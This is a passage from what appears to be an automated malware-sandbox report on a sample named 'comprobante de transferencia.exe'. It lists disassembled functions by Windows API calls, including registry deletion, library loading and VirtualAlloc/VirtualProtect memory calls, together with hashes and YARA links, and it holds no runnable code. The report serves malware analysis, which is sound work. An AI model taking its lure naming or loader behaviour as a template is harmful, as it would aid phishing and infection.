Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000690,00000000,00000022,00000000,?,?), ref: 00402CF1

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
RegCloseKey.ADVAPI32(00000000), ref: 00402347

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: ec2e56ee61c9e08def1d50c1f8a6808fef06f3ab76a6156b5f6b2d5bdcf65ddb
Instruction ID: 619afea56069f31c127a8e11fd0f1f435edbd74989573f139d652fd0604b037d
Opcode Fuzzy Hash: ec2e56ee61c9e08def1d50c1f8a6808fef06f3ab76a6156b5f6b2d5bdcf65ddb
Instruction Fuzzy Hash: 8AF0AF32A04100ABEB10BFB48A4EABE72699B80314F14843BF501B71D1C9FC9D025629

Uniqueness

Uniqueness Score: -1.00%

Function 0040156B Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 0040157F
ShowWindow.USER32(?), ref: 00401594

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 4b08649e2767e153eb05ad833bbe1713a4ba0a3d3c758775f708b13ea380d49e
Instruction ID: 14d99bf0b22e04dc8d6d27e1a0bb6c10309fac34fbb9e600a12b00824ffe684e
Opcode Fuzzy Hash: 4b08649e2767e153eb05ad833bbe1713a4ba0a3d3c758775f708b13ea380d49e
Instruction Fuzzy Hash: 5EE04F32B001049BCB24CBA8ED808AE77A6AB88320750453FD902B36A0CA74DC51CF28

Uniqueness

Uniqueness Score: -1.00%

Function 004063F4 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
GetProcAddress.KERNEL32(00000000,?), ref: 00406421

Part of subcall function 00406384: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
Part of subcall function 00406384: wsprintfW.USER32 ref: 004063D6
Part of subcall function 00406384: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004063EA

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
Instruction ID: 5dc38b7c1614d08ea85e9237aecc352f838a6b2874e2c17184f6d3a6923fef4e
Opcode Fuzzy Hash: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
Instruction Fuzzy Hash: 02E086326081225BD31157715D4497776A8AA9D640306043EFD06F61C1D774AC219AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,?), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 347994a47e66675a56206e59af71a82015a20bd66eb05692f0dc3c3b28152ec7
Instruction ID: c65acc83bfa495384d8d8e75d5cf87c092469090b0d1be5324bf36691b182b4f
Opcode Fuzzy Hash: 347994a47e66675a56206e59af71a82015a20bd66eb05692f0dc3c3b28152ec7
Instruction Fuzzy Hash: C1E08C32A04100ABC720AFB5AA8999D3375EF90369B10057BE402F10E1C6BCAC409A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00405BEF Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\comprobante de transferencia.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405BF3
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405C15

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
Instruction ID: be88a92cb82447fd1599dbd49a9896cb6db060ceaa3ec03b2970cb079924df1d
Opcode Fuzzy Hash: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
Instruction Fuzzy Hash: FDD09E71658201AFEF098F20DE16F2E7AA2EB84B00F10562CB642940E0D6B15815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 004056C5 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004056CB
GetLastError.KERNEL32 ref: 004056D9

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
Instruction ID: fb2ec3850198e6a3c32e9ec6a0d6f7e4a8645a4513041e6eac74538e2b64e397
Opcode Fuzzy Hash: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
Instruction Fuzzy Hash: 51C04C30A18642DBD6505B20ED087177950AB50741F60CD35610BF11A0D6759811DD3E

Uniqueness

Uniqueness Score: -1.00%

Function 100028A4 Relevance: 2.7, APIs: 2, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 10002963
GetLastError.KERNEL32 ref: 10002A6A

Memory Dump Source

Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00401673 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 2709739294a990dc73731c5d5ee29084b050ed7b5d4126b103810d59a933f9e4
Instruction ID: 1b5114671cd2f37f61593a5948342403c0197a7a9993dea188d241478f0c7c7c
Opcode Fuzzy Hash: 2709739294a990dc73731c5d5ee29084b050ed7b5d4126b103810d59a933f9e4
Instruction Fuzzy Hash: 16F0963160511097CB107B754E0DD5F31659B82328B24467BB911B21E5D9BC8A01956E

Uniqueness

Uniqueness Score: -1.00%

Function 00402786 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0

Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 390f2af81ab463b3cbd4013dd9a57b5a130c00408a04b447ab1cf3b55cc0eeb8
Instruction ID: 1be42fce3669e14aef02856632b8c3fd6eb27c701acbe6074d6f00ab1ddd0ca8
Opcode Fuzzy Hash: 390f2af81ab463b3cbd4013dd9a57b5a130c00408a04b447ab1cf3b55cc0eeb8
Instruction Fuzzy Hash: 30E04F71B05515EBDB11AFA59E4ADAF776AEB40329B14043BF101F00E1C67D8C419A3E

Uniqueness

Uniqueness Score: -1.00%

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 981c7979ba822dccdb72df52fcfe6b7f87be0c37e1a4f4794e53a06bb608896e
Instruction ID: 149acb2e4c8d2ab334bf79ea3f96ce17df26442c265e53a7283cdf21b2f65ea8
Opcode Fuzzy Hash: 981c7979ba822dccdb72df52fcfe6b7f87be0c37e1a4f4794e53a06bb608896e
Instruction Fuzzy Hash: B3E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB511B66C6D5FC1D4146A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040172D Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: eaacdd191c7eea98fc74c72ee0c8fabea13cd959233ea4d6937bd7f6f4107858
Instruction ID: 3ece1a6015159183f920534ecfc8dbbbdcbcaab1af18821eb087b1273417be7a
Opcode Fuzzy Hash: eaacdd191c7eea98fc74c72ee0c8fabea13cd959233ea4d6937bd7f6f4107858
Instruction Fuzzy Hash: C1E08672304100EBD750CFA4DE49AAA77ACDF403B8F20457BF615E61D1E6B49A41973D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C72 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040321F,00000000,00000000,00403076,000000FF,00000004,00000000,00000000,00000000), ref: 00405C86

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
Instruction ID: ef4ecac980915e2f81eec60b371ea7b66f7146230b2cbae24b16510ac7dd1765
Opcode Fuzzy Hash: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
Instruction Fuzzy Hash: 53E0EC3265835AABEF109E659C08AEB7B6CEB05360F004432F915E6190D271E8219BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000690,00000000,00000022,00000000,?,?), ref: 00402CF1

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
Instruction ID: 2fd216668262c1d23633d06d3759517c993b1d1f21998de780648112abb91376
Opcode Fuzzy Hash: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
Instruction Fuzzy Hash: 64E08676244108BFDB00DFA4DD47FD577ECEB44700F004421BA08D7091C774E5408768

Uniqueness

Uniqueness Score: -1.00%

Function 00405CA1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004031ED,00000000,0040BEA0,?,0040BEA0,?,000000FF,00000004,00000000), ref: 00405CB5

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
Instruction ID: ba43a9b4bceeecaa6f2f3e0d34fbf098cac3b3b9582c4b6c2afca3054f4c0e18
Opcode Fuzzy Hash: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
Instruction Fuzzy Hash: 53E08632114319ABDF105E509C40EEB3B6CEB00350F004432F915E3180D231F8219BA4

Uniqueness

Uniqueness Score: -1.00%

Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5

Memory Dump Source

Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19

Uniqueness

Uniqueness Score: -1.00%

Function 004022DF Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310

Memory Dump Source

